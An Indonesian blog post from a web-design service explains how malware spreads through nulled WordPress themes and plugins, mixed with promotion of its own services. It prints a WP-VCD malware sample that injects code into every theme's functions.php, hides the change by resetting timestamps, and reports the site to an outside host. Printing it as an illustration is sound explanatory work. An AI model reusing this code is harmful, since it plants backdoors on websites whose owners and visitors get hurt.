DICKY IBROHIM
Jasa Pembuatan Website SEO Expert

Bagaimana Malware Menginfeksi Situs WordPress

WordPress adalah CMS yang banyak digunakan untuk mengelola website atau e-commerce di dunia termasuk di Indonesia. Semakin populer platform akan semakin besar peluang kejahatan online masuk termasuk melalui malware.

Sebagian besar malware dalam WordPress di distribusikan pada tema atau plugin nulled atau di unduh dari situs tidak resmi. Banyak dalih mereka yang menggunakan cara ini, misal karena mereka merasa kekurangan dana untuk membeli/menyewa lisensi langsung dari developer, mereka tergiur dengan marketing penjual di luar dengan harga miring dan janji manis, hanya untuk uji coba, dan masih banyak lagi.

Alternatif mencegah malware masuk dan menginfeksi ke website dari WordPress individual atau menginfeksi semua situs dalam satu hosting yang sama, sebagai berikut:

  1. Menggunakan lisensi asli dari developer, atau
  2. Menggunakan jasa pembuatan website professional full support
  3. Menggunakan versi gratis dari pengembang

Yang harus Anda hindari apapun alasan dan janji manis penjual adalah:

  1. Membeli di luar situs resmi
  2. Menggunakan jasa install dengan lisensi penyimpangan (biasanya dijual dengan harga murah)
  3. Mengunduh dari situs bukan resmi secara gratis atau berbayar, nulled atau tanpa lisensi

Jika anda terlanjur melakukannya, silahkan segera antisipasi kerugian besar dengan membeli ke pengembang asli atau berpindah ke layanan jasa website full support yang akan meng-handle keamanan situs anda. Percayalah ini jalan terbaik.

Kenapa menggunakan lisensi dari developer langsung?

  1. Selain mendukung developer mengembangkan tema atau plugin mereka, membeli atau menyewa lisensi dari pengembang langsung akan mendapatkan akses masuk serta dukungan atas apapun masalah terkait produk mereka (diluar itu tidak dilayani atau membayar lebih). Setiap layanan berbayar biasanya fokus pada produk dan keamanan (mereka akan berusaha keras memperbaiki celah yang ada).
  2. Pengembang biasanya meningkatkan versi dengan melakukan perbaikan atau pemutahiran kode dan keamanan.

Kenapa menggunakan jasa pembuatan website full support?

Jasa pembuatan website full support berbeda dengan jasa setup atau jasa website pada umumnya. Mereka ahli dalam bidang tersebut dan biasanya memiliki pengalaman diatas 5 tahun. Mereka yang memiliki prestasi pembuktian akan lebih menjamin.

Jasa pembuatan website full support mengelola hosting atau server dengan sangat baik sehingga ketika ada ancaman, mereka akan membimbing kita atau melakukan pencegahan tanpa perlu kita minta (terkadang perlu biaya dan ada juga yang gratis, namun sangat jarang ada biaya tambahan).

Jasa pembuatan website full support sudah 1 bundle. Artinya 1 jasa Anda sudah mendapatkan pengaturan SEO paling optimal versi penyedia jasa website tersebut, sudah siap digunakan, mendapatkan panduan, mendapatkan bantuan langsung atau tidak langsung. Hal ini membuat lebih hemat dari pada membeli satuan serta lebih terbukti ampuh.

Ciri utama jasa pembuatan website full support adalah kita seperti raja dan supernyaman tanpa perlu skill khusus. Biasanya orang awampun akan lancar disini.

CLEOVA telah fokus kebidang ini sejak 2011 dan hingga sekarang masih berkomitmen tinggi untuk Anda. Memiliki sertifikat relevan dan dikelola oleh Wisudawan 67 terbaik IT swasta populer dari Kota Semarang, jawa Tengah.

Semua itu sudah sangat cukup menyakinkan bahkan dibandingkan layanan sekelas perusahaan besar dengan biaya lebih rendah dan hampir bisa dikatakan sama bahkan lebih. Tunggu apa lagi?, Percayakan website anda untuk lebih aan, hemat, dan lebih terjamin kelangsungan bisnis Anda didunia digital.

Menggunakan versi gratis pengembang adalah langkah aman saat tidak ada biaya.

Jika biaya yang tersedia sangat minim, maka versi gratis langsung dari pengembang lebih baik dari pada versi premium nulled, bajakan, atau di-download dari situs tidak resmi karena jauh lebih aman.

Kenapa jasa setup atau jasa install meski mereka menawarkan kunci asli tetap tidak di rekomendasikan?

Jawaban pastinya adalah mereka orang luar dan dapat menyisipi kode jahat atau mata-mata. Penjahat tidak pernah mengatakan mereka berniat buruk jika anda bertanya kepadanya (meskipun tidak semua). Berhati-hatilah karena banyak akun social media dijual belikan untuk kepentingan spam termasuk kepentingan testimoni palsu.

Tips lanjutan untuk terhindari dari infeksi malware pada website!

Setelah anda tidak menggunakan bajakan atau mengunduh dari situs tidak resmi bahkan termasuk tidak menggunakan jasa setup bebas, langkah selanjutnya adalah memasang Anti malware populer dan up to date.

Sebagian dari anti malware dapat mendeteksi malware yang sedang marak, meskipun tidak 100%. Mungkin anda perlu jasa perbaikan website dengan biaya tambahan (tentu lebih mahal) untuk memastikan website anda sudah aman.

Jangan pernah tergiur dengan plugin atau tema nulled, bajakan, download gratis/berbayar dari situs tidak resmi, bahkan jasa setup plugin/theme premium tetapi tidak memberikan kunci asli ke Anda (bisa jadi kunci hasil penyimpangan di-suspend, atau skrip asli disusupi sesuatu yang jahat).

Bahaya nyata Malware

Mereka banyak di distribusikan dari hal-hal yang telah kami anjurkan untuk ditinggalkan diatas.

Biaya perbaikan dapat berlipat-lipat lebih mahal dari harga lisensi bahkan harga total keseluruhan situs anda termasuk biaya hosting dan domain.

Malware dapat menginfeksi berkala (anda bersihkan saat ini, jika masih ada benih tertinggal akan kembali).

  1. Malware dapat menginfeksi seluruh situs dalam 1 hosting atau server sehingga akan mengakibatkan bisnis gagal.
  2. Situs anda turun kepercayaan dan trafiknya sebab dari ketidaknyamanan malware (semakin berat, semakin banyak iklan tak di inginkan, dan lainnya).
  3. Situs Anda dihapus dari mesin pencarian seperti Google dan ditandai tidak aman.
  4. Situs anda akan mudah dicuri datanya (missal toko online), maka data pelanggan menjadi tanggungjawab pengelola (biaya yang ditimbulkan mungkin sangat tinggi)
  5. Jatuh dari posisi ideal di mesin pencarian

Contoh Malware yang banyak menginfeksi WordPress saat ini mudah kita kenal Malware WP-VCD

Malware membuat file wp-vcd.php di folder wp-includes. Meski kita hapus ia akan kembali muncul dan seterusnya. Selain itu, malware ini memodifikasi beberapa file penting WordPress sehingga akan selalu berjalan meski telah dihapus.

Anda hapus malware, maka akan kembali dan seterusnya hingga Anda menghapus semua inti masalah bersamaan termasuk menghapus plugin atau tema bajakan yang anda gunakan.

WP-VCD jenisnya adalah Adsware yaitu malware yang mengambil keuntungan di situs Anda dengan memasang iklan pencipta yang merugikan Anda. Jenis malware yang digunakan WP-VCD sejauh ini adalah iklan popup. WP-VCD biasanya injects backdoor code ke tema meskipun malware berasal dari plugin atau sebaliknya.

Untungnya Contoh malware WP-CVD sudah terdeteksi dengan mudah di layanan scan malware untuk web seperti: https://sitecheck.sucuri.net/ sehingga kita dengan mudah mengetahui situs kita terinfeksi dan mencari jalan keluar.

Menurut pengguna jasa perbaikan web wordpress di layanan kami, meskipun menggunakan anti malware berupa plugin, Model WP-VCD tetap saja terus muncul meski segera diatasi plugin keamanan tersebut. Dampaknya, anti malware atau plugin keamanan terkait terus bekerja hanya untuk membersihkan malware yang terus muncul sehingga sumber daya lebih cepat habis dari biasanya.

Telat membersihkan malware dari WordPress, rata-rata posisi di Google menurun dan ditinggalkan pengunjung setia karena iklan sangat mengganggu bahkan terkadang iklan berbau mengancam misal: “anda terserang Malware, download blab la bla…”.

Masih banyak jenis malware mengancam situs terutama platform sumber terbuka seperti WordPress. Buat websitemu ke ahlinya dengan kenyamanan dan keamanan ekstra dilayanan Kami atau membeli lisensi ke developer asli adalah 2 pilihan terbaik.

Contoh bagian kode yang dibuat oleh Malware diambil dari salah satu pengguna jasa perbaikan website di layanan kami:


$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else
{
$ping = false;
}
}
}
else
{
$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
$ping2 = true;
}
else
{
//$ping = false;
}
}
}
}
}
}
if ($ping) {
$content = @file_get_contents('http://www.zarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.zarors.com/admin.txt'));
}
if ($ping2) {
$content = @file_get_contents('http://www.zarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.zarors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
}

Perlu anda tau, banyak penyimpangan akhir-akhir ini marak terjadi, dimana mereka yang baru bisa membuat website membuka jasa pembuatan website dengan modal nulled atau download dari situs luar.

Kamu harus tau bahwa murah didepan namun setelah diluncurkan ada masalah akan lebih menguras uang Anda. Pastikan pilih keahlinya (siap pakai seperti di layanan CLEOVA) atau langsung ke developer (perlu skill dan optimasi lanjutan sendiri)

Malware tidak terdeteksi

Ini dapat terjadi karena malware versi mutahir yang belum di ikuti penangkalnya atau memang kinerjanya sangat baik. Biasanya perlu penanganan ahli karena tidak dapat dideteksi dengan plugin. Dampak dapat langsung ataupun tidak langsung.

Efek WordPress terjangkit malware

Langsung:

Ketika terinfeksi baik dari kelemahan kode, plugin/theme nulled atau mengunduh diluar situs resmi, biasanya langsung memiliki dampak.

Beberapa dampak hanya terjadi di perangkat seluler, beberapa ada yang berdampak pada seluler dan desktop, dan beberapa dengan kondisi jika admin tidak dalam keadaan login

Tidak langsung:

Menunggu kondisi tertentu.

Baik efek langsung dan tidak langsung terkadang tidak mudah disadari admin sehingga perlu penanganan lanjutan.

Ancaman juga untuk pengunjung web terinfeksi Malware

Malvertising merupakan iklan yang ditanami malware dan di letakan disitus terinfeksi sehingga jika pengunjung tidak hati-hari perangkat mereka akan terkena malware juga.

Naasnya Kebanyakan Malware yang menginfeksi website sangat berpotensi besar mengandung Malvertising. Biasanya pengunjung yang terjangkit/ terinfeksi akan mengalami iklan bertubi-tubi saat browsing internet berupa popup atau push notifikasi.